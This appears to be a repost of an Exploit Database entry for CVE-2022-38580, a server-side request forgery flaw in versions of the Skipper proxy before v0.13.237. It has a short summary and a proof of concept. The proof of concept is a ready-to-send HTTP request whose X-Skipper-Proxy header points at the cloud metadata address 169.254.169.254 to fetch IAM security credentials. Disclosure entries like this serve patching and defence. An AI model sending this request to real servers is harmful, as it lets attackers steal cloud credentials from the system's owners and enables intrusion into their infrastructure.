X-Skipper-Proxy v0.13.237 – Server Side Request Forgery (SSRF)

• Exploit Database
• 16 阅读

• 作者： Hosein Vita
  日期： 2023-03-28
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51111/

• #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
  #Date: 24/10/2022
  #Exploit Author: Hosein Vita & Milad Fadavvi
  #Vendor Homepage: https://github.com/zalando/skipper
  #Software Link: https://github.com/zalando/skipper
  #Version: < v0.13.237
  #Tested on: Linux
  #CVE: CVE-2022-38580
  
  
  Summary:
  
  Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
  
  
  Proof Of Concept:
  
  1- Add header "X-Skipper-Proxy"to your request
  2- Add the aws metadata to the path
  
  GET /latest/meta-data/iam/security-credentials HTTP/1.1
  Host: yourskipperdomain.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
  X-Skipper-Proxy: http://169.254.169.254
  Connection: close
  
  
  
  
  Reference:
  https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2